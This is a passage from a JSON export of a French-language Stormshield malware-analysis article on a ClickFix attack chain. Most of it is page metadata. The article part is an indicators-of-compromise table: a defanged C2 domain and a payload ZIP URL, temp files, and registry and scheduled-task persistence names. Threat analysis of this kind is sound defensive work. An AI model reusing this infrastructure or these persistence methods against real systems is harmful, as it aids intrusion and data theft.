      URL utilis\u00e9e pour exfiltrer les informations d\u00e9couvertes sur le syst\u00e8me de la victime. Les informations sont transmises en param\u00e8tre de requ\u00eate GET.<\/span><\/div><\/div><\/div><\/td><\/tr>
      Domaine<\/span><\/div><\/div><\/div><\/td>
      Payload n\u00b02<\/span><\/div><\/div><\/div><\/td>
      hailmeinc[.]com<\/span><\/div><\/div><\/div><\/td>
      C2 d'un autre payload.<\/span><\/div><\/div><\/div><\/td><\/tr>
      URL<\/span><\/div><\/div><\/div><\/td>
      C2 n\u00b02<\/span><\/div><\/div><\/div><\/td>
      https[:]\/\/hailmeinc[.]com\/bkmsiqop[.]zip<\/span><\/div><\/div><\/div><\/td>
      Fourniture d'un second payload.<\/span><\/div><\/div><\/div><\/td><\/tr>
      Fichier<\/span><\/div><\/div><\/div><\/td>
      Payload n\u00b02<\/span><\/div><\/div><\/div><\/td>
      %TEMP%metvtbg3_zpd_ptred.zip<\/span><\/div><\/div><\/div><\/td>
      Payload t\u00e9l\u00e9charg\u00e9 sous forme d'archive ZIP.<\/span><\/div><\/div><\/div><\/td><\/tr>
      Fichier<\/span><\/div><\/div><\/div><\/td>
      Payload n\u00b02<\/span><\/div><\/div><\/div><\/td>
      %TEMP%metvtbg3_zpd_ptred.zip.tmp<\/span><\/div><\/div><\/div><\/td>
      Fichier temporaire de t\u00e9l\u00e9chargement du payload n\u00b02.
      Ce fichier n'est pas supprim\u00e9 si le t\u00e9l\u00e9chargement d\u00e9livre un fichier de moins de 10 KB.

      <\/p><\/span><\/div><\/div><\/div><\/td><\/tr>

      Registre<\/span><\/div><\/div><\/div><\/td>
      Persistance payload n\u00b01<\/span><\/div><\/div><\/div><\/td>
      HKCUSoftwareMicrosoftWindowsCurrentVersionRunivni9_sauqw9_csq_jzdfo<\/span><\/div><\/div><\/div><\/td>
      Cl\u00e9 registre de d\u00e9marrage du payload \u00e0 l'ouverture de la session de l'utilisateur.<\/span><\/div><\/div><\/div><\/td><\/tr>
      T\u00e2che planifi\u00e9e<\/span><\/div><\/div><\/div><\/td>
      Persistance payload n\u00b01<\/span><\/div><\/div><\/div><\/td>
      ivni9_sauqw9_csq_jzdfo<\/span><\/div><\/div><\/div><\/td>
      T\u00e2che planifi\u00e9e de d\u00e9marrage du payload \u00e0 l'ouverture de la session de l'utilisateur.<\/span><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"

      [vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_column_text css=\u00a0\u00bb\u00a0\u00bb] Pr\u00e9ambule Dans un pr\u00e9c\u00e9dent article, nous vous avions propos\u00e9 un aper\u00e7u global de la technique ClickFix. Une chaine d’attaque exploitant cette m\u00e9thode a \u00e9t\u00e9 d\u00e9tect\u00e9e \u00e0 la mi mars 2026 et mise en lumi\u00e8re sur\u00a0X (anciennement…<\/p>\n","protected":false},"author":83,"featured_media":774044,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[7065],"tags":[4368],"business_size":[],"industry":[],"help_mefind":[],"features":[],"type_security":[],"maintenance":[],"offer":[],"administration_tools":[],"cloud_offers":[],"listing_product":[],"class_list":["post-773972","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technical-posts-fr","tag-la-cybersecurite-par-stormshield"],"acf":[],"yoast_head":"\nAnalyse d'une Cha\u00eene d'Attaque ClickFix - Partie 1<\/title>\n<meta name=\"description\" content=\"D\u00e9cortiquez avec nous la cha\u00eene d'attaque compl\u00e8te ClickFix, de la phase d'acc\u00e8s initial \u00e0 la phase d'ex\u00e9cution.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Analyse d'une Cha\u00eene d'Attaque ClickFix - Partie 1\" \/>\n<meta property=\"og:description\" content=\"D\u00e9cortiquez avec nous la cha\u00eene d'attaque compl\u00e8te ClickFix, de la phase d'acc\u00e8s initial \u00e0 la phase d'ex\u00e9cution.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/\" \/>\n<meta property=\"og:site_name\" content=\"Stormshield\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-23T07:11:28+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-1623819493-scaled.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1707\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Stormshield Customer Security Lab\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Stormshield\" \/>\n<meta name=\"twitter:site\" content=\"@Stormshield\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Stormshield Customer Security Lab\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"14 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/\"},\"author\":{\"name\":\"Stormshield Customer Security Lab\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#\\\/schema\\\/person\\\/a05f467cec789f90c8a355b178743249\"},\"headline\":\"Analyse d’une cha\u00eene d’attaque de type ClickFix (partie 1)\",\"datePublished\":\"2026-04-23T07:11:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/\"},\"wordCount\":5697,\"image\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock-1623819493-scaled.jpg\",\"keywords\":[\"La cybers\u00e9curit\u00e9 - par Stormshield\"],\"articleSection\":[\"Billets techniques\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/\",\"url\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/\",\"name\":\"Analyse d'une Cha\u00eene d'Attaque ClickFix - Partie 1\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock-1623819493-scaled.jpg\",\"datePublished\":\"2026-04-23T07:11:28+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#\\\/schema\\\/person\\\/a05f467cec789f90c8a355b178743249\"},\"description\":\"D\u00e9cortiquez avec nous la cha\u00eene d'attaque compl\u00e8te ClickFix, de la phase d'acc\u00e8s initial \u00e0 la phase d'ex\u00e9cution.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock-1623819493-scaled.jpg\",\"contentUrl\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock-1623819493-scaled.jpg\",\"width\":2560,\"height\":1707},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Analyse d’une cha\u00eene d’attaque de type ClickFix (partie 1)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/\",\"name\":\"Stormshield\",\"description\":\"Stormshield\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#\\\/schema\\\/person\\\/a05f467cec789f90c8a355b178743249\",\"name\":\"Stormshield Customer Security Lab\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g\",\"caption\":\"Stormshield Customer Security Lab\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Analyse d'une Cha\u00eene d'Attaque ClickFix - Partie 1","description":"D\u00e9cortiquez avec nous la cha\u00eene d'attaque compl\u00e8te ClickFix, de la phase d'acc\u00e8s initial \u00e0 la phase d'ex\u00e9cution.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/","og_locale":"fr_FR","og_type":"article","og_title":"Analyse d'une Cha\u00eene d'Attaque ClickFix - Partie 1","og_description":"D\u00e9cortiquez avec nous la cha\u00eene d'attaque compl\u00e8te ClickFix, de la phase d'acc\u00e8s initial \u00e0 la phase d'ex\u00e9cution.","og_url":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/","og_site_name":"Stormshield","article_published_time":"2026-04-23T07:11:28+00:00","og_image":[{"width":2560,"height":1707,"url":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-1623819493-scaled.jpg","type":"image\/jpeg"}],"author":"Stormshield Customer Security Lab","twitter_card":"summary_large_image","twitter_creator":"@Stormshield","twitter_site":"@Stormshield","twitter_misc":{"\u00c9crit par":"Stormshield Customer Security Lab","Dur\u00e9e de lecture estim\u00e9e":"14 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#article","isPartOf":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/"},"author":{"name":"Stormshield Customer Security Lab","@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249"},"headline":"Analyse d’une cha\u00eene d’attaque de type ClickFix (partie 1)","datePublished":"2026-04-23T07:11:28+00:00","mainEntityOfPage":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/"},"wordCount":5697,"image":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#primaryimage"},"thumbnailUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-1623819493-scaled.jpg","keywords":["La cybers\u00e9curit\u00e9 - par Stormshield"],"articleSection":["Billets techniques"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/","url":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/","name":"Analyse d'une Cha\u00eene d'Attaque ClickFix - Partie 1","isPartOf":{"@id":"https:\/\/www.stormshield.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#primaryimage"},"image":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#primaryimage"},"thumbnailUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-1623819493-scaled.jpg","datePublished":"2026-04-23T07:11:28+00:00","author":{"@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249"},"description":"D\u00e9cortiquez avec nous la cha\u00eene d'attaque compl\u00e8te ClickFix, de la phase d'acc\u00e8s initial \u00e0 la phase d'ex\u00e9cution.","breadcrumb":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#primaryimage","url":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-1623819493-scaled.jpg","contentUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-1623819493-scaled.jpg","width":2560,"height":1707},{"@type":"BreadcrumbList","@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.stormshield.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Analyse d’une cha\u00eene d’attaque de type ClickFix (partie 1)"}]},{"@type":"WebSite","@id":"https:\/\/www.stormshield.com\/fr\/#website","url":"https:\/\/www.stormshield.com\/fr\/","name":"Stormshield","description":"Stormshield","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.stormshield.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249","name":"Stormshield Customer Security Lab","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g","caption":"Stormshield Customer Security Lab"}}]}},"_links":{"self":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/773972","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/users\/83"}],"replies":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/comments?post=773972"}],"version-history":[{"count":19,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/773972\/revisions"}],"predecessor-version":[{"id":773979,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/773972\/revisions\/773979"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/media\/774044"}],"wp:attachment":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/media?parent=773972"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/categories?post=773972"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/tags?post=773972"},{"taxonomy":"business_size","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/business_size?post=773972"},{"taxonomy":"industry","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/industry?post=773972"},{"taxonomy":"help_mefind","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/help_mefind?post=773972"},{"taxonomy":"features","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/features?post=773972"},{"taxonomy":"type_security","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/type_security?post=773972"},{"taxonomy":"maintenance","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/maintenance?post=773972"},{"taxonomy":"offer","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/offer?post=773972"},{"taxonomy":"administration_tools","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/administration_tools?post=773972"},{"taxonomy":"cloud_offers","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/cloud_offers?post=773972"},{"taxonomy":"listing_product","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/listing_product?post=773972"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}